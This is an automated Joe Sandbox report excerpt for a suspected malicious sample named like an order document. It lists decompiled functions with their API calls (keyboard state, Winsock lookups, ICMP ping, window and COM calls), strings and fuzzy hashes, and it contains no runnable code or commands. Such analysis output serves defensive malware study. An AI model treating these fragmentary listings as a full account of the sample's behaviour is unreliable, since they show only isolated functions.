Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction ID: aeda5f4c58aedfe1ab235c20283fe4d5ea771f7082be7751d6cf8c6703a47079
Opcode Fuzzy Hash: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction Fuzzy Hash: 7961AB70A01600CFDB26AF15DD88BAAB7B5FF85715F14452FE04686AB0C738A8D1DB8D

Function 0041B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

GetSysColor.USER32(0000000F), ref: 0041B438

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction ID: 9056983834b32c36ed4150570584b1c03209aeafd6b8b45defaf711a91559013
Opcode Fuzzy Hash: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction Fuzzy Hash: 3041C530541100AFDF216F68DC89BFA3766EF46730F148666FDA58A2E6C7348C81C769

Function 0044690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00446923
_wcscpy.LIBCMT ref: 00446934
__wsplitpath.LIBCMT ref: 00446958
__wsplitpath.LIBCMT ref: 00446979
_wcscpy.LIBCMT ref: 0044699B
_wcscpy.LIBCMT ref: 004469B9
_wcscpy.LIBCMT ref: 004469C7
_wcscat.LIBCMT ref: 004469D6
_wcscat.LIBCMT ref: 00446A2B
_wcscat.LIBCMT ref: 00446A61
_wcscat.LIBCMT ref: 00446A73

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction ID: 005bd8409d3bb68de46a5ddcaf555a5972e9497e9b379132242b511ffcb9ea52
Opcode Fuzzy Hash: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction Fuzzy Hash: 3C417EB694512CAFDF61EB91DC85DCB73BCEB44300F4001A7F649A2051EA74ABE88F59

Function 0044D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0049DC00,0049DC00,0049DC00), ref: 0044D7CE
GetDriveTypeW.KERNEL32(?,004B3A70,00000061), ref: 0044D898
_wcscpy.LIBCMT ref: 0044D8C2

Strings

removable, xrefs: 0044D800
all, xrefs: 0044D7D4
fixed, xrefs: 0044D816
cdrom, xrefs: 0044D7EA
ramdisk, xrefs: 0044D842
unknown, xrefs: 0044D859
network, xrefs: 0044D82C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 27dd89965dd486c355bf12e5958c17b9eceaa65f898452980bc2b070e1fbd423
Instruction ID: 6215e8b66333fdb673da60b32a2a8998b562a6f15a09a5f6086e7d3bbaedb77f
Opcode Fuzzy Hash: 27dd89965dd486c355bf12e5958c17b9eceaa65f898452980bc2b070e1fbd423
Instruction Fuzzy Hash: BB51F734504301AFD700EF15DC91AAFB7A5EF84318F20882FF8A957292EB38DD45CA4A

Function 0040936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004093AB
__itow.LIBCMT ref: 004093DF

Part of subcall function 00421557: _xtow@16.LIBCMT ref: 00421578

Strings

0x%p, xrefs: 00474CAD
False, xrefs: 00474C93
True, xrefs: 00474C8C
%.15g, xrefs: 004093A5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 577bc0861796b8261368056c90b843c4a53b7175ab165f2c3a9dab1d51633459
Instruction ID: 0ed78e77f9698b809d02e899a200000ec7101b462ac89f610c664c3257f1291c
Opcode Fuzzy Hash: 577bc0861796b8261368056c90b843c4a53b7175ab165f2c3a9dab1d51633459
Instruction Fuzzy Hash: 8A41C571600204AFDB249F75D941EBA73E4EB88304F20447FE549D72D2EB39AD42CB59

Function 0046A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0046A259
CreateCompatibleDC.GDI32(00000000), ref: 0046A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0046A273
SelectObject.GDI32(00000000,00000000), ref: 0046A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0046A286
DeleteDC.GDI32(00000000), ref: 0046A28F
GetWindowLongW.USER32(?,000000EC), ref: 0046A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0046A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0046A2B9

Strings

static, xrefs: 0046A1F1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 04059288f0612eee2913be471e87d3cea3018146251acc12bc86b50143704a6e
Instruction ID: 986c0112dff5ea32e0688fc01ade664d254e7fb72aa65afae893e1e38ea2680e
Opcode Fuzzy Hash: 04059288f0612eee2913be471e87d3cea3018146251acc12bc86b50143704a6e
Instruction Fuzzy Hash: 9631AF31501118ABDF115FA4DC49FEF3B69FF09324F100229FA19A22E0D739D821DB6A

Function 00446F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00446F1D
gethostname.WSOCK32(?,00000100), ref: 00446F37
gethostbyname.WSOCK32(?), ref: 00446F44
_wcscpy.LIBCMT ref: 00446F6C
inet_ntoa.WSOCK32(?), ref: 00446F8A
_strcat.LIBCMT ref: 00446F98
_wcscpy.LIBCMT ref: 00446FAF
WSACleanup.WSOCK32 ref: 00446FBD
_wcscpy.LIBCMT ref: 00446FCB

Strings

0.0.0.0, xrefs: 00446F66

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 9d6fd2ed91ba6aa9e90f4df857676565db699ef19e6ec5c52a5473821e06dc47
Instruction ID: 9ff267ec6d560c425b52b79f1213ef4c92f4d937c1e0f718be36d2864fea819c
Opcode Fuzzy Hash: 9d6fd2ed91ba6aa9e90f4df857676565db699ef19e6ec5c52a5473821e06dc47
Instruction Fuzzy Hash: 72112731904114AFEB146B61AC49EDE77ACEF01714F01007BF44592082EF78AE85875D

Function 0042500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00425047

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__gmtime64_s.LIBCMT ref: 004250E0
__gmtime64_s.LIBCMT ref: 00425116
__gmtime64_s.LIBCMT ref: 00425133
__allrem.LIBCMT ref: 00425189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251A5
__allrem.LIBCMT ref: 004251BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251DA
__allrem.LIBCMT ref: 004251F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042520F
__invoke_watson.LIBCMT ref: 00425280

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 90e1e9256e69eabba9ee52f5690f89fe01e33d53c5fc913f30279bab376557cd
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 3E71D771B00B26ABE7149E79DC41B6AB3A8AF14368F54426FF410D63C1E778DD408BD8

Function 00444DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444DF8
GetMenuItemInfoW.USER32(004C1708,000000FF,00000000,00000030), ref: 00444E59
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 00444E8F
Sleep.KERNEL32(000001F4), ref: 00444EA1
GetMenuItemCount.USER32(?), ref: 00444EE5
GetMenuItemID.USER32(?,00000000), ref: 00444F01
GetMenuItemID.USER32(?,-00000001), ref: 00444F2B
GetMenuItemID.USER32(?,?), ref: 00444F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00444FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FEB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction ID: fe9dd4acc330e0067c0764243ddef19340b974bd8c93f78c1856fcd7b282a81b
Opcode Fuzzy Hash: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction Fuzzy Hash: 5A618071900289EFEB11CFA4D884EAF7BB8FB85308F14055BF541A7291D739AD49CB29

Function 00469C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00469C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00469C9B
GetWindowLongW.USER32(?,000000F0), ref: 00469CBF
_memset.LIBCMT ref: 00469CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00469CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00469D5A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: a8f5480123bb04e77a673ba8b4727e5d29bebc5111f3fe49591b11d156f1d37b
Instruction ID: c641717cd16f34e064070c6fb9a8910300556aedad1884a20629e16e47b980a1
Opcode Fuzzy Hash: a8f5480123bb04e77a673ba8b4727e5d29bebc5111f3fe49591b11d156f1d37b
Instruction Fuzzy Hash: 1E617C75A00208AFDB10DFA4CC81EEE77B8EF09714F14416AFA04E72A2D7B4AD46DB55

Function 00442B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442B5F
GetAsyncKeyState.USER32(000000A0), ref: 00442BE0
GetKeyState.USER32(000000A0), ref: 00442BFB
GetAsyncKeyState.USER32(000000A1), ref: 00442C15
GetKeyState.USER32(000000A1), ref: 00442C2A
GetAsyncKeyState.USER32(00000011), ref: 00442C42
GetKeyState.USER32(00000011), ref: 00442C54
GetAsyncKeyState.USER32(00000012), ref: 00442C6C
GetKeyState.USER32(00000012), ref: 00442C7E
GetAsyncKeyState.USER32(0000005B), ref: 00442C96
GetKeyState.USER32(0000005B), ref: 00442CA8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction ID: 98e4a09438c2f24bdc0efa4923423c0104262d1b5743e155bd91d11c533266cc
Opcode Fuzzy Hash: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction Fuzzy Hash: 2141D5309047C96DFF309B608A443ABBFA0AB11354F84445FE9C6563C2DBDC9AC4C7AA

Function 004394E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004394FE
SafeArrayAllocData.OLEAUT32(?), ref: 00439549
VariantInit.OLEAUT32(?), ref: 0043955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0043957B
VariantCopy.OLEAUT32(?,?), ref: 004395BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 004395D2
VariantClear.OLEAUT32(?), ref: 004395E7
SafeArrayDestroyData.OLEAUT32(?), ref: 004395F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004395FD
VariantClear.OLEAUT32(?), ref: 0043960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043961A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction ID: e980d16f425cbb2d7f1633ed62324256478b1fd8f64321c89d047c85fae3fde7
Opcode Fuzzy Hash: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction Fuzzy Hash: E4414F31D01219AFCB01EFA4DC849DEBB79FF08754F00846AE552A3251DB74EA85CBA9

Function 0045BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045BB5C
VariantInit.OLEAUT32(?), ref: 0045BC2D
VariantInit.OLEAUT32(?), ref: 0045BD2E
VariantClear.OLEAUT32(?), ref: 0045BD38
VariantClear.OLEAUT32(?), ref: 0045BD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0045BD11
h?K, xrefs: 0045BB2D
|?K, xrefs: 0045BB34
Null Object assignment in FOR..IN loop, xrefs: 0045BBBD, 0045BCEB, 0045BDA7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?K$|?K
API String ID: 2862541840-2406439248
Opcode ID: 6e4e10243490a1572ac59a79694cec31bb5b9fc99f04c3f17a603e71361ee7b6
Instruction ID: 462dca1ff8e4cd4e8f51f2ae79d12a39a36ebdc8fee863f05bd706811c307ba1
Opcode Fuzzy Hash: 6e4e10243490a1572ac59a79694cec31bb5b9fc99f04c3f17a603e71361ee7b6
Instruction Fuzzy Hash: 5191A071A00215ABDB24CF95C844FAFB7B8EF84715F10851EF905AB282D7789949CFA8

Function 0045ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32 ref: 0045ADF6
CoUninitialize.OLE32 ref: 0045AE01
CoCreateInstance.OLE32(?,00000000,00000017,0048D8FC,?), ref: 0045AE61
IIDFromString.OLE32(?,?), ref: 0045AED4
VariantInit.OLEAUT32(?), ref: 0045AF6E
VariantClear.OLEAUT32(?), ref: 0045AFCF

Strings

Failed to create object, xrefs: 0045AE6C, 0045AF22
Invalid parameter, xrefs: 0045AEED
NULL Pointer assignment, xrefs: 0045AEA6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction ID: c20346a15e988a54f04bac49df2388cda8baec57d7b2c93a2b2cfcbf474f938e
Opcode Fuzzy Hash: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction Fuzzy Hash: AB61AA712082019FD710EF54C885B6BB7E8AF48705F104A1EF9859B292C738ED48CB9B

Function 00458107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00458168
inet_addr.WSOCK32(?,?,?), ref: 004581AD
gethostbyname.WSOCK32(?), ref: 004581B9
IcmpCreateFile.IPHLPAPI ref: 004581C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00458237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0045824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004582C2
WSACleanup.WSOCK32 ref: 004582C8

Strings

Ping, xrefs: 004581EB

